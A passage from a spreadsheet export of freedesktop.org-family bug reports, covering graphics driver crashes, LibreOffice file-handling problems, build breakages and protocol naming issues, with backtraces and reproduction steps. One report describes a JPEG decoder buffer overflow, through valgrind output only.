#18 0x00007f8d6923dc8f in _cairo_paginated_surface_finish (abstract_surface=0x556abcd189b0) at ../../../../src/cairo-paginated-surface.c:213
#19 0x00007f8d69268ec6 in _cairo_surface_finish (surface=0x556abcd189b0)
    at ../../../../src/cairo-surface.c:1033
#20 0x00007f8d69269ad7 in INT_cairo_surface_finish (surface=0x556abcd189b0)
    at ../../../../src/cairo-surface.c:1080
#21 0x00007f8d6a458b17 in unix_end_run (op=0x556abc2d5430 wait=0 cancelled=0)
    at ././gtk/gtkprintoperation-unix.c:373
#22 0x00007f8d6a32a5f8 in print_pages_idle (user_data=0x556abcd048c0)
    at ././gtk/gtkprintoperation.c:2935
#23 0x00007f8d69dc7b90 in gdk_threads_dispatch (data=0x556abc48fa00)
    at ././gdk/gdk.c:743</t>
  </si>
  <si>
    <t>ORC-41294</t>
  </si>
  <si>
    <t>Crash related with gstreamer's audioconvert</t>
  </si>
  <si>
    <t>This crashes:
gst-launch-0.10 audiotestsrc num-buffers=1 ! audio/x-raw-intendianness=(int)1234channels=(int)2width=(int)16signed=(boolean)truerate=(int)44100depth=(int)16 ! audioconvert ! audio/x-raw-floatrate=(int)44100channels=(int)2endianness=(int)1234width=(int)32 ! fakesink
Setting pipeline to PAUSED ...
Pipeline is PREROLLING ...
Caught SIGSEGV accessing address 0xb70e47cc
#0  0xb785e424 in __kernel_vsyscall ()
#1  0xb7545f86 in ?? ()
#2  0xb767f9ab in ?? ()
#3  0xb766f55f in ?? ()
#4  0xb766fbeb in ?? ()
#5  0xb77b79ca in ?? ()
#6  0x0804ace5 in _DYNAMIC ()
#7  0x0804cfd3 in ?? ()
#8  0xb749de46 in ?? ()
#9  0x0804a8b1 in ?? ()
(Yeah I know not very helpful stack-trace). But with ORC_CODE=backup it works just fine.</t>
  </si>
  <si>
    <t>TELEPATHY-71262</t>
  </si>
  <si>
    <t>[1.0] change namespace from im.telepathy1 to im.telepathy.v1</t>
  </si>
  <si>
    <t>The 'next' branch uses the namespace im.telepathy1 but we don't actually own that domain name.
Collabora does own im.telepathy on behalf of the Telepathy project. We should use a name in that namespace like im.telepathy.v1.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-65769</t>
  </si>
  <si>
    <t>Add backslash to  key on Portuguese keyboard</t>
  </si>
  <si>
    <t>Created attachment 80830
Patch adding the keysym.
According to 
http://en.wikipedia.org/wiki/File:KB_Portuguese.svg 
the 2nd key on the 4th row of the Portuguese keyboard should generate a '\' when pressed with the AltGr modifier.
The attached patch will adds this keysym.</t>
  </si>
  <si>
    <t>XORG-213</t>
  </si>
  <si>
    <t>Monolithic Release Must Fix</t>
  </si>
  <si>
    <t>This is a place holder for all bugs that must be fixed prior to first
release. It will have dependancies on all showstopping bugs</t>
  </si>
  <si>
    <t>stuart.kreitman</t>
  </si>
  <si>
    <t>TELEPATHY-35100</t>
  </si>
  <si>
    <t>New error SoftwareUpgradeRequired</t>
  </si>
  <si>
    <t>Some connection libraries can detect when a library upgrade is required and sometimes will disconnect clients that do not claim to support the latest protocol version. This error would allow clients to detect that as a disconnection reason and inform the user appropriately.</t>
  </si>
  <si>
    <t>MESA-17895</t>
  </si>
  <si>
    <t>Radeon XPRESS 200M (RC410) - xorg crash after prolonged exercise of compiz</t>
  </si>
  <si>
    <t>Created attachment 19361
Xorg.0.log after X server crashes
Linux 2.6.26.3-14.fc8 Fedora 8
All code was checked out with git_xorg.sh script as of 2008-08-22. Kernel
driver radeon was compiled from current git too. See bug #17723 for description of setup.
Ensured that at least 64Mb of video memory are available else I hit bug #17723 . 
Compiz is enabled and it works for a while. After a few hours including at least one change of emerald theme the X server crashes with a SIGSEGV.
Backtrace:
0: /usr/bin/X(xf86SigHandler+0x79) [0x80b0ed9]
1: [0x110400]
2: /home/alex/xserver/lib/dri/r300_dri.so(_mesa_update_texture+0x251) [0x3ecc01]
3: /home/alex/xserver/lib/dri/r300_dri.so(_mesa_update_state_locked+0x801) [0x3d
73e1]
4: /home/alex/xserver/lib/dri/r300_dri.so(_mesa_update_state+0x2a) [0x3d753a]
5: /home/alex/xserver/lib/dri/r300_dri.so(_mesa_GetIntegerv+0x258) [0x4b30f8]
6: /home/alex/xserver/lib/xorg/modules/extensions//libglx.so [0x2529f0]
7: /home/alex/xserver/lib/xorg/modules/extensions//libglx.so [0x245470]
8: /home/alex/xserver/lib/xorg/modules/extensions//libglx.so [0x24412a]
9: /home/alex/xserver/lib/xorg/modules/extensions//libglx.so [0x248966]
10: /usr/bin/X(Dispatch+0x32f) [0x8086eaf]
11: /usr/bin/X(main+0x3da) [0x806c79a]
12: /lib/libc.so.6(__libc_start_main+0xe0) [0x978390]
13: /usr/bin/X [0x806bc11]
Fatal server error:
Caught signal 11.  Server aborting
dmesg shows no sign of failed message as shown in bug #17723. Xorg.0.log attached.
It seems at least one change of emerald theme is required. However the emerald theme change itself does not trigger the crash. It might occur some time later or not at all. Right before the crash of this (attached) log I was exercising a compiz plugin and then tried to call a dialog on gedit.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-42230</t>
  </si>
  <si>
    <t>Incorrect URL</t>
  </si>
  <si>
    <t>On main page clicking on Bugzilla User's Guide results in a 404 !
The requested URL /docs/html/using.html was not found on this server.</t>
  </si>
  <si>
    <t>robert.beattie</t>
  </si>
  <si>
    <t>CAIRO-14038</t>
  </si>
  <si>
    <t>negative stride with image surface</t>
  </si>
  <si>
    <t>defining FbPixels.stride as unsigned int result with bad calculation.
fix by defining FbPixels.stride as FbStride
tested under version 1.4.6</t>
  </si>
  <si>
    <t>kpub</t>
  </si>
  <si>
    <t>MESA-46679</t>
  </si>
  <si>
    <t>glReadPixels on a luminance texture returns the wrong values</t>
  </si>
  <si>
    <t>According to the GL spec it seems when reading values from a texture in luminance format it should set the R component to the luminance value and set the G and B components to zero but Mesa is currently setting all of the components to the luminance value. This makes it so that if you try to read it back in luminance format you don't get the same values you put in. There is already code in texgetimage.c to handle this for glGetTexImage so I guess we should just copy that to somewhere in readpix.c.
This bug was found while discussing bug 46631.</t>
  </si>
  <si>
    <t>XORG-17486</t>
  </si>
  <si>
    <t>[GEM EXA]regression compiz-fusion 0.7.x broken on GM965</t>
  </si>
  <si>
    <t>Created attachment 18746
Xorg.0.log with EXA after running compiz-fusion
System : Dell XPS M1330
Chipset: GM965 with 2 * 1GB memory in dual channel configuration
OS : Ubuntu 8.04.1 in 32-Bit
tested with git tip components of 09/08/2008:
libdrm: (master)2880c86eb246aceeb5c750e27259a7b6d8897328
mesa 3d: (master)11d694b1bb0cb384d802d7e0e252cf5119febb98
xserver: (master)2db1afbf2e56d8743c701d81a5797001ce9e5c52
xf86-video-intel: (master)b9ef0ed7d7b96eca6394cd0d367369ec511d1bcd
gem kernel (eric's 2.6.27-rc4)1063ef90845d7c84f4799ac34bd23ef37860bdc0
http://cgit.freedesktop.org/~anholt/linux-2.6/commit/?h=drm-gem-merge&amp;id=1063ef90845d7c84f4799ac34bd23ef37860bdc0
compiz-fusion: 0.7.4-0ubuntu7 (the compiz-kde module for kde 3.5.9 requires compiz-fusion 0.7.4 and doesn't allow me to easily switch to a more recent compiz version such as 0.7.6)
Running compiz freezes the desktop. The mouse point can still be moved but nothing selected or changed. The GUI looks frozen but the machine didn't crash (e.g. can connect to it via ssh). The only suspicious event written to Xorg.0.log at the moment when running compiz:
exaCopyDirty: Pending damage region empty!
With Non-GEM intel driver and xserver mesa libdrm versions of Ubuntu 8.04.1  compiz-fusion works fine and this message is not written to Xorg.0.log. I've never seen compiz-fusion working with GEM and EXA. But I have seen it working with GEM + UXA however at the moment that one breaks in a similar way.
Everything else looks fine:
Checking for Xgl: not present.
xset q doesn't reveal the location of the log file. Using fallback /var/log/Xorg.0.log
Detected PCI ID for VGA: 00:02.0 0300: 8086:2a02 (rev 0c) (prog-if 00 [VGA controller])
Checking for texture_from_pixmap: not present.
Trying again with indirect rendering:
Checking for texture_from_pixmap: present.
Checking for non power of two support: present.
Checking for Composite extension: present.
Comparing resolution (1280x800) to maximum 3D texture size (2048): Passed.
Checking for nVidia: not present.
Checking for FBConfig: present.
Checking for Xgl: not present.
/usr/bin/compiz.real (video) - Warn: No 8 bit GLX pixmap format disabling YV12 image format</t>
  </si>
  <si>
    <t>LIBREOFFICE-40087</t>
  </si>
  <si>
    <t>FILESAVE - calc crashes when saving a file where individual sheets have been moved.</t>
  </si>
  <si>
    <t>I have a calc file with a separate sheet for each month of the year and an averages sheet which gives weekly average values for the whole year. At the start of the year these are in the order averages/January/February/...../December. At the end of each month I move that months sheet to the end so that the order becomes averages/this month/next month/..../last month. This worked fine in Open Office before the fork I can't remember whether it first occurred in LibreOffice 3.3 but it's certainly been there in every subversion of 3.4.
I can save the file OK then if I move a sheet to the end position it appears to work OK but if I now try to save the file again the green progress bar reaches c.25% then stops and after about 10 seconds LibreOffice calc crashes.
I can submit the file if it helps.</t>
  </si>
  <si>
    <t>lord_knows_who</t>
  </si>
  <si>
    <t>LIBREOFFICE-79719</t>
  </si>
  <si>
    <t>FILEOPEN / EDITING: ##-MMM-## not recognized as date</t>
  </si>
  <si>
    <t>While a ##-MMM-## date format is ambiguous for example 12-MAR-14 could be either 2012-03-14 or 2014-03-12 depending on convention and therefor is not automatically recognized as date this crappy format is written by some big vendor's database reports instead of an unambiguous ##-MMM-#### or ISO 8601 YYYY-MM-DD
Change date recognition such that ##-MMM-## is assumed to be ##-MMM-#### (only if the first number is a day value of course).</t>
  </si>
  <si>
    <t>SWFDEC-17589</t>
  </si>
  <si>
    <t>dsjpeg Huffman table parser validation error.</t>
  </si>
  <si>
    <t>Created attachment 18885
trigger a buffer overflow in the DHT marker handler.
dsjpeg can be tricked into overflowing its internal Huffman table arrays.  Valgrind says of the attached test case:
==31295== Copyright (C) 2004-2006 and GNU GPL'd by OpenWorks LLP.
==31295== Using valgrind-3.2.1-Debian a dynamic binary instrumentation framework.
==31295== Copyright (C) 2000-2006 and GNU GPL'd by Julian Seward et al.
==31295== For more details rerun with: -v
==31295==
==31295== Invalid write of size 1
==31295==    at 0x40382C: huffman_table_add (jpeg_huffman.c:48)
==31295==    by 0x401B59: huffman_table_init_jpeg (jpeg.c:273)
==31295==    by 0x402B8C: jpeg_decoder_define_huffman_tables (jpeg.c:751)
==31295==    by 0x4028D9: jpeg_decoder_decode (jpeg.c:672)
==31295==    by 0x403C24: jpeg_decode_argb (jpeg_rgb_decoder.c:58)
==31295==    by 0x400DB0: main (load.c:46)
==31295==  Address 0x537B434 is 12 bytes after a block of size 43984 alloc'd
==31295==    at 0x4A1B858: malloc (vg_replace_malloc.c:149)
==31295==    by 0x40245F: jpeg_decoder_new (jpeg.c:535)
==31295==    by 0x403C07: jpeg_decode_argb (jpeg_rgb_decoder.c:55)
==31295==    by 0x400DB0: main (load.c:46)
==31295==
==31295== Invalid write of size 4
==31295==    at 0x403844: huffman_table_add (jpeg_huffman.c:49)
==31295==    by 0x401B59: huffman_table_init_jpeg (jpeg.c:273)
[snip]
When run without valgrind this test case causes glibc to abort on x86-64:
*** glibc detected *** free(): invalid pointer: 0x0000000000512f40 ***
error: decoder error: bad huffsize[] arrayAborted
On x86-32 the test causes dsjpeg to error out with a message bad huffsize[] array seemingly intact but note that the bug isn't 64 bit specific.</t>
  </si>
  <si>
    <t>MESA-99309</t>
  </si>
  <si>
    <t>[radeonsi]glsl: Override the # of varying slots for ClipDistance and TessLevel*. broke chromium browser</t>
  </si>
  <si>
    <t>Hi after upgrade mesa-git chromium starts looking like garbage.
I've tested this on polaris and i965(haswell) and only radeon is infected
kernel - 4.9 or 4.10-drm-next-wip
mesa - from git
llvm - r291295
ddx - amdgpu-git
bisecting:
8b5749f65ac434961308ccb579fb8a816e4f29d5 is the first bad commit
commit 8b5749f65ac434961308ccb579fb8a816e4f29d5
Author: Kenneth Graunke 
Date:   Sun Nov 15 04:37:50 2015 -0800
    glsl: Override the # of varying slots for ClipDistance and TessLevel*.
    Right now this shouldn't have any effect as all drivers use
    LowerClipDist and LowerTessFactors to turn the float[] arrays into
    vectors.
    However it should help make it possible for drivers to avoid that
    lowering.
    me is the only issue for now
    Signed-off-by: Kenneth Graunke 
    Reviewed-by: Jason Ekstrand 
    Reviewed-by: Timothy Arceri 
after reverting browser works corectly</t>
  </si>
  <si>
    <t>LIBREOFFICE-40146</t>
  </si>
  <si>
    <t>FILEOPEN xlsx landscape page with interchanged width/height values</t>
  </si>
  <si>
    <t>Created attachment 50279
Sample file
In the attached file the page layout is set to landscape.  However LibreOffice 3.4.2 and 3.3.3 default to printing it portrait.  Also if I try to change to landscape the top of the document is chopped off.  Using the libreoffice.org rpms on Fedora 15.</t>
  </si>
  <si>
    <t>XORG-24008</t>
  </si>
  <si>
    <t>The server announces wrong protocol versions.</t>
  </si>
  <si>
    <t>See the discussion around: http://lists.freedesktop.org/archives/xorg-devel/2009-September/002024.html
The server currently uses RENDER_MAJOR/RENDER_MINOR to announce its protocol versions. If the protocol is updated the server may announce versions it doesn't actually support.
TODO: which protocols are affected by this?</t>
  </si>
  <si>
    <t>LIBREOFFICE-38007</t>
  </si>
  <si>
    <t>[DE] String to long in Tools - Options - Writer - Basic Fonts</t>
  </si>
  <si>
    <t>This is for German UI on Windows and Linux:
- open a writer document
- choose Tools - Options Writer - Basic fonts (any of western asian or CTL)
The label Schriftgrad (Size) is cut see screenshot.
Although we could change the GErman translation it was better to have the UI little wider. 
I'll ask at l10n list if other languages are affected as well and on design list if there are any options to the change.</t>
  </si>
  <si>
    <t>SPICE-38024</t>
  </si>
  <si>
    <t>regression: multiple devices: server mouse cannot escape a single window</t>
  </si>
  <si>
    <t>When running a winxp vm with two qxl pci devices both enabled not in fullscreen mouse captured in one window you cannot move the mouse to the other window. This is a regression compared to spicec.
How to reproduce:
1. start qemu with two devices (-vga qxl -device qxl)
2. install driver for both devices
3. enable second monitor
4. capture mouse in one monitor by clicking.
5. try to move the mouse to the second monitor
Expected results:
mouse moves to second monitor
Achieved results:
mouse stays captured in first monitor. Actually it excapes the boundary of the monitor but then returns. The capture seems to be implemented differently compared to spicec on this respect as well.</t>
  </si>
  <si>
    <t>alevy</t>
  </si>
  <si>
    <t>LIBREOFFICE-45327</t>
  </si>
  <si>
    <t>: IPA Unicode keyboard input not working</t>
  </si>
  <si>
    <t>Problem description: 
This happens in Linux using the Ibus keyboard input with the IPA Unicode 5.1 (ver. 1.2) keyboard installed (available from www.sil.org)
When using the IPA Unicode Ibus input the keystroke sequences do not generate the correct IPA (International Phonetic Alphabet) Unicode characters. Instead only the first character in the keystroke sequence is displayed.
Other parts of my system are working correctly. For example the keyboard input works fine with an ordinary text editor (gedit). Keyboard input also works fine when using the Ibus pinyin interface. However a similar issue seems to exist typing into a browser window in Chrome e.g. Google mail compose interface. I do not as yet know if the two issues are related.
Also this is NOT a problem with the display I can cut-and-paste the characters from a text document into LibreOffice and they are displayed correctly. It is the keyboard input that is not functioning.
Steps to reproduce:
1. Open any LibreOffice document.
2. Change to IPA Unicode in the Ibus preferences either using keyboard shortcuts or the Ibus UI.
3. Start typing. Example: type the following:
s=z=t=d=n&gt;l=r=r&gt;?=w=
Current behavior:
The following text is displayed:
sztdnlrr?w
Expected behavior:
the following text should be displayed:
ÊƒÊ’Î¸Ã°Å‹É¬É¹É¾Ê”Ê
Platform (if different from the browser): 
Ubuntu 11.10 X86_64
Browser: Chrome/16.0.912.77</t>
  </si>
  <si>
    <t>bobjohnbowles</t>
  </si>
  <si>
    <t>XORG-17254</t>
  </si>
  <si>
    <t>latest radeon commit from michael danzer breaks xv output</t>
  </si>
  <si>
    <t>the commit from michael danzer (a55e85f742d1334bf88e4681e553f025d2de38df)breaks the xv output (a lot of rgb lines greenred blended into the movie) reverting back to92ee21df344a989778e37369c7beb3904a00ead6 fixes the problem.</t>
  </si>
  <si>
    <t>MESA-92639</t>
  </si>
  <si>
    <t>[Regression bisected] Ogles1conform mustpass.c fail</t>
  </si>
  <si>
    <t>Created attachment 119143
mustpass.c test log
Setup:
------
Hardware
CPU : Intel(R) Core(TM) m5-6Y57 CPU @ 1.10GHz (family: 6 model: 78  stepping: 3)
MCP : SKL-Y  D1 2+2 (ou ULX-D1)
QDF : QJK9
CPU : SKL D0
Chipset PCH: Sunrise Point LP C1      
CRB : SKY LAKE Y LPDDR3 RVP3 CRB FAB2
Reworks : All Mandatories + FBS02FBS03 F23 O-02 &amp; O-06
Software
BIOS : SKLSE2R1.R00.X097.B02.1509020030
ME FW : 11.0.0.1173
Ksc (EC FW): 1.19
Linux distribution: Ubuntu 14.04 LTS 64 bits
kernel 4.3.0-rc5-drm-intel-nightly+
commit f14b17b8639fb680c672d3d2f8d6414fcf0f82c4
Author: Daniel Vetter 
Date:   Fri Oct 16 19:27:49 2015 +0200
    drm-intel-nightly: 2015y-10m-16d-17h-27m-10s UTC integration manifest
cairo: (HEAD tag: 1.14.2) 93422b3cb5e0ef8104b8194c8873124ce2f5ea2d
drm: (HEAD tag: libdrm-2.4.65 tag: 2.4.65) c3496167637e35cf8a52d5e7e53a412e79d80db0
intel-driver: (HEAD origin/master origin/HEAD master) 2a72f99d24714f2a58f400ef63b913d4cf9080b3
libva: (HEAD tag: libva-1.6.1 origin/v1.6-branch) 613eb962b45fbbd1526d751e88e0d8897af6c0e0
mesa: (HEAD origin/master origin/HEAD) 6f3954618b0fe273af76af79ce9ec56566b79b2a
xf86-video-intel: (HEAD origin/master origin/HEAD master) f0fd4d500de03c30c7ce19915f85acadd1ca4e5d
xserver: (HEAD tag: xorg-server-1.17.2) 2123f7682d522619f101b05fb75efa75dabbe371
ogles1conform: (HEAD origin/gles1 gles1) 36970add1adb2e10a63721bb99ac47cc17d785fa
Steps:
------
run the command :
./conform -v 2 -1 mustpass.c
Actual result:
---------------
The result of the test is fail.
Expected result:
----------------
The result is pass.</t>
  </si>
  <si>
    <t>MESA-84651</t>
  </si>
  <si>
    <t>Distorted graphics or black window when running Battle.net app on Intel hardware via wine</t>
  </si>
  <si>
    <t>Created attachment 107309
Twisted graphics with HD2000
Hello
Recently updated Battle.net App no longer works under wine. On my machine (SNB HD2000 + Arch + Mesa 10.3 + xf86-video-intel 2.99.916-3 + xorg-server 1.16.1-1) the graphics of the Battle.net app is twisted. (See attachment)
Another person using Haswell HD 4600 hardware also experiences similar issues except they seeing a black area instead of a twisted image.
People also find switching to a different non-Intel card solves the problem.
Original Wine bug: https://bugs.winehq.org/show_bug.cgi?id=37347
Battle.net app: https://us.battle.net/account/download/
With regards
Xinkai</t>
  </si>
  <si>
    <t>yeled.nova</t>
  </si>
  <si>
    <t>POPPLER-94288</t>
  </si>
  <si>
    <t>Poppler fails to build in GNOME Continuous since commit:
https://cgit.freedesktop.org/poppler/poppler/commit/?id=989ceb6bd90cc8a79dd48c58183f1855de269c9b
With the error:
make[3]: *** No rule to make target 'FlateEncoder.cc' needed by 'libpoppler_la-FlateEncoder.lo'.  Stop.
Continuous builds Poppler with the flags:
ob: Using build directory '_build'
ob: running: ../configure --build=x86_64-linux --prefix=/usr --libdir=/usr/lib --sysconfdir=/etc --localstatedir=/var --bindir=/usr/bin --sbindir=/usr/bin --datadir=/usr/share --includedir=/usr/include --libexecdir=/usr/libexec --mandir=/usr/share/man --infodir=/usr/share/info --disable-static --disable-silent-rules --disable-poppler-cpp --disable-utils
Building poppler with support for:
  font configuration:  fontconfig
  splash output:       yes
  cairo output:        yes
  qt4 wrapper:         no
  qt5 wrapper:         no
  glib wrapper:        yes
    introspection:     yes
  cpp wrapper:         no
  use gtk-doc:         no
  use libjpeg:         yes
  use libpng:          yes
  use libtiff:         yes
  use zlib compress:   yes
  use zlib uncompress: no
  use libcurl:         no
  use libopenjpeg:     yes
      with openjpeg1
  use cms:             no
  command line utils:  no
  test data dir:       /ostbuild/source/poppler/_build/../../test</t>
  </si>
  <si>
    <t>CAIROMM-76820</t>
  </si>
  <si>
    <t>MS VC 2010 Build files broken</t>
  </si>
  <si>
    <t>The project file for cairo-1.0 in the MS VC 2010 solution does not build ootb:
  surface.obj : error LNK2019: unresolved external symbol public: __cdecl Cair
o::Device::Device(struct _cairo_device *bool) (??0Device@Cairo@@QEAA@PEAU_cai
ro_device@@_N@Z) referenced in function public: class Cairo::RefPtr&lt;class Cair
o::Device&gt; __cdecl Cairo::Surface::get_device(void) (?get_device@Surface@Cairo
@@QEAA?AV?$RefPtr@VDevice@Cairo@@@2@XZ)
This is because the 'device.cc' source file is not linked in the solution.
Manual fix is to open the solution file and add 'device.cc' to the list of source files inside the 'cairomm-1.0' project.
Also some header files are not linked in the project:
context_private.h
device.h
quartz_font.h
types.h
This may cause problems on some systems.</t>
  </si>
  <si>
    <t>david.weiss</t>
  </si>
  <si>
    <t>POLICYKIT-95513</t>
  </si>
  <si>
    <t>[PATCH] Fix a race condition when terminating runaway_killer_thread</t>
  </si>
  <si>
    <t>The code used to call g_main_loop_quit() from the main thread without
having any guarantee that runaway_killer_thread_func() has even entered
its g_main_loop_run().  If a main loop is not running
g_main_loop_quit() has no effect.
This could occasionally be reproduced in
test-polkitbackendjsauthority.c which is creating several very
short-lived PolkitBackendJSAuthority instances.  Real polkitd should not
generally be affected because it is using a single instance running for
the life of the process ~ for the uptime of the system enough time to
enter the runaway_killer_thread main loop.</t>
  </si>
  <si>
    <t>DRI-68030</t>
  </si>
  <si>
    <t>[Haswell] blank Screen with intel ddx on first use right after using fbdev ddx. Breaking SuSE Install</t>
  </si>
  <si>
    <t>Created attachment 83979
script to reproduce bug
Bug description:
Blank screen on the first intel DDX run right after running FBDEV DDX.
Not even possible to alternate to fbcon. Have to reboot or restart X to get screen back.
This behaviour breaks SuSE installation.
System environment:
-- chipset: Haswell
-- system architecture: x86_64
-- xf86-video-intel: xorg-x11-driver-video-7.4.0.1-0.81.27
-- xserver: 1.6.5
-- libdrm: 2.4.41-0.8.46
-- kernel: nightly 7e4f3f0cb9d232721bfdaa00c27c5550f70428a8 3.11.0-rc4-0.11
-- Linux distribution: SLED
-- Display connector: DP
Reproducing steps:
- Run Intel ddx and stop it.
- Run FBDEV ddx and stop it.
- Run Intel ddx again.
- Blank Screen (only on first run after fbdev)
- Restart X or machine and screen is back.</t>
  </si>
  <si>
    <t>MESA-39121</t>
  </si>
  <si>
    <t>Random black shaped artifacts in gnome-shell</t>
  </si>
  <si>
    <t>Created attachment 48943
Picture of an artifact
Hi
There are some black shaped artifacts occuring over window on gnome-shell.
I managed to record a video and extract an image displaying such an artifact.
This bug is not deterministic however it is very frequent : to make it appears I only moved a terminal window on the bottom edge of the screen.
Note that this bug is not specific to gnome-shell it also appears on kwin effect in kde and in others circumstance in gnome-shell but the scenario described above is the easiest to reproduce.
My hardware is AMD Zacate E350 (evergreen based) using Mesa 7.11 rc1 (bug is also in 7.10.x) on opensuse 11.4 64bits(is also on Fedora 15) with r600g drivers libdrm 2.4.26 and ati ddx 14.2 kernel 2.6.39.
Vincent</t>
  </si>
  <si>
    <t>XCB-71502</t>
  </si>
  <si>
    <t>xcb_ge_event_t change causes API breakage</t>
  </si>
  <si>
    <t>By removing/replacing xcb_ge_event_t seems you break source/binary compatibility.
For example Qt5 apps crash and Qt5 cannot be built with libxcb 1.9.2/1.9.3 see https://bugreports.qt-project.org/browse/QTBUG-34748 for more info.</t>
  </si>
  <si>
    <t>PKG-CONFIG-5278</t>
  </si>
  <si>
    <t>Solaris fixes are not portable</t>
  </si>
  <si>
    <t>The check scripts all begin:
#! /bin/sh
# Do the Solaris Dance:
if [ ! -d ~root ]   then
    exec /usr/xpg4/bin/sh $0 $@ 
fi
The condition being fixed is non-POSIX shell (according to ChangeLog) the fix
is specific to Solaris in its standard installation and the test is does user
'root' exist and does its home directory exist. Why not test for the problem
itself or for the platform where the problem is known? I have reports from users
who have no ~root (for various reasons) on machines that are not Solaris and
that do not have xpg4.
./configure should check $host for being solaris and either write the check
scripts directly or pass a token to check/Makefile that sets and env var that
the check scripts check to determine whether to relauch. Even better would be to
have ./configure check /bin/sh itself and then fall through to an alternate
shell if needed checking that it exists. That way any user who has non-POSIX
/bin/sh benefits and such a person could use a flag to pass the correct shell path.</t>
  </si>
  <si>
    <t>LIBREOFFICE-52461</t>
  </si>
  <si>
    <t>Cell border highlight when selecting formula gives 2 or more different colors to same cell</t>
  </si>
  <si>
    <t>Created attachment 64630
Libreoffice
Attached visual representation of problem.
When you have same cell in formula more then once LO gives that cell as many colors as there are mentions in formula when it shoud give it same color for every reference inside formula.
Notice that cell E6 has 2 colors in LO RED and GREEN when in Excel (attachment no.2) it's always GREEN.</t>
  </si>
  <si>
    <t>rachitgupta1792</t>
  </si>
  <si>
    <t>MESA-2909</t>
  </si>
  <si>
    <t>glx.h and glxext.h broken for GLX 1.3 and 1.4 function pointers</t>
  </si>
  <si>
    <t>I finally decided to track down something that has bothered me for years
(witness the comments in glxgears_fbconfig.c).  The function pointer typedefs
(the PFNGLX*PROC typedefs) for core GLX 1.3 and 1.4 in GL/glxext.h are never
available.  They exist in the file but application source code can never access it.
I tracked this down to the fact that GLX_VERSION_1_3 and GLX_VERSION_1_4 are
defined in GL/glx.h.  This causes all of the function prototypes defines and
typedefs in GL/glxext.h to be skipped.  Since we'd like code to be
source-portable from other GLX systems this seems wrong.
Just removing the #defines from GL/glx.h replaced this problem with other
compile-time problems.
I believe the correct solution is to follow the model of GL/gl.h and GL/glext.h.
 That is don't put any new features in GL/glx.h that are in GL/glxext.h.  I
can make this change if people think this is the right way to go.</t>
  </si>
  <si>
    <t>XORG-29255</t>
  </si>
  <si>
    <t>DisplayPort output distorted</t>
  </si>
  <si>
    <t>Created attachment 37394
distortions on external display
I have a notebook with switchable graphics (discrete ATI Mobility Radeon HD 
5650 and integrated Intel Arrandale). The DisplayPort only works with the 
discrete adapter but this limitation also exists in Windows so I guess the 
DisplayPort is hard-wired to the discrete card.
If I use the radeon driver it detects whenever I plug something into the 
DisplayPort. E.g. I have a DisplayPort-to-VGA adapter (for projectors) and 
test it with my LCD monitor that luckily has a VGA input too. xrandr detects 
the connection and suggests the correct resolution and frequency (1680x1050 
@60Hz). But the image is totally distorted. It looks like a old tube monitor 
that runs a too high frequency you can see this on the attached screenshot. What you cannot see is that the distortions move quite fast and are not static.
I switched back to 1024x768@60Hz but the problem persists and the optional 75.1Hz do not make any difference too.
The same settings work fine with Windows so I suspect this issue to be caused by the radeon driver.
Is there any way to see what's going wrong and maybe fix this?
- Kernel 2.6.34
- XOrg 7.5
- xf86-driver-ati  6.13.0</t>
  </si>
  <si>
    <t>TELEPATHY-22927</t>
  </si>
  <si>
    <t>[fixed in git] split NameInUse into three D-Bus errors</t>
  </si>
  <si>
    <t>Not_Yours is too special to use for this (clients should handle it a bit specially) and I think it's useful to divide up the three cases:
* server kicked old connection offline because a new connection appeared
* server made new connection fail because there is still an old connection
* in-band registration failed because the account exists on the server already</t>
  </si>
  <si>
    <t>PULSEAUDIO-64284</t>
  </si>
  <si>
    <t>Shorter-than-prebuf streams are silent if started corked</t>
  </si>
  <si>
    <t>If a stream is shorter than prebuf and the stream is started in the corked state its audio will get discarded when uncorking.
I'll attach a program that reproduces the issue and a fix for the bug. The fix is a quick hack and probably not suitable as the final solution. I haven't investigated the root cause myself that deeply yet but I was told that the audio gets discarded during rewinding so the proper fix probably involves modifying the rewinding code.
How to compile test.c:
gcc test.c -std=c99 $(pkg-config --cflags --libs libpulse) -lm -o test</t>
  </si>
  <si>
    <t>XORG-16262</t>
  </si>
  <si>
    <t>[945GM] intermittent crashes</t>
  </si>
  <si>
    <t>Created attachment 16976
X server log from crashed session
X crashes not constantly I'd say every few days.  I have not noticed any triggering condition or pattern.  I have seen bug #14709 I have no idea if this is related.  Enclosed is a copy of a log from a crashed session.</t>
  </si>
  <si>
    <t>celejar</t>
  </si>
  <si>
    <t>FONTCONFIG-36</t>
  </si>
  <si>
    <t>fontconfig.spec file is bogus</t>
  </si>
  <si>
    <t>When switching to automake I added fontconfig.spec.in to create RH
packages but I haven't a clue what belongs inside it.</t>
  </si>
  <si>
    <t>TELEPATHY-34337</t>
  </si>
  <si>
    <t>tp-glib doesn't compile under gcc 4.6</t>
  </si>
  <si>
    <t>I would write stuff here but I'm annoyed about the lack of a --disable-werror flag so I'd just end up flaming.</t>
  </si>
  <si>
    <t>danw</t>
  </si>
  <si>
    <t>DBUS-33840</t>
  </si>
  <si>
    <t>test/Makefile.am dist-hook is crufty and unreliable</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #30285 +++
I wrote:
&gt; In a test build the following distributed files incorrectly embed my build
&gt; directory:
[...]
&gt; I think the culprit is the dist-hook rule in test/Makefile.am.
then fixed the bug by making it even more complex.
wjt replied:
&gt; This hook seems kind of crufty in general. I guess replacing it with an
&gt; explicit EXTRA_DIST list would not be trivial?
Further discussion:
15:09  wjt: my first go at #30825 did replace the crufty hook with 
              EXTRA_DIST but it's a comically long list and has a lot of 
              special cases where files are randomly copied around so I gave up
15:09  hehe
15:09  I'll revisit it later
15:09  i think i looked at this once and was afraid of it</t>
  </si>
  <si>
    <t>LIBREOFFICE-45091</t>
  </si>
  <si>
    <t>Application hangs after last step of Form Wizard</t>
  </si>
  <si>
    <t>Created attachment 55972
screen shot
Test platform: Ubuntu 11.04 (AMD64) Unity Java 1_6.26
Steps to reproduce (sometimes)
Open database (embedded HSQL tested)
Select Form wizard
Select Table
Select All fields
Click finished
Form window is displayed table control is drawn no data displayed.
Application hangs (intermittent)</t>
  </si>
  <si>
    <t>drew</t>
  </si>
  <si>
    <t>DBUS-42532</t>
  </si>
  <si>
    <t>Support for building on Android</t>
  </si>
  <si>
    <t>Created attachment 53082
Patch to build on Android
This patch enables building dbus-glib on Android using Android NDK and androgenizer</t>
  </si>
  <si>
    <t>alvaro.soliverez</t>
  </si>
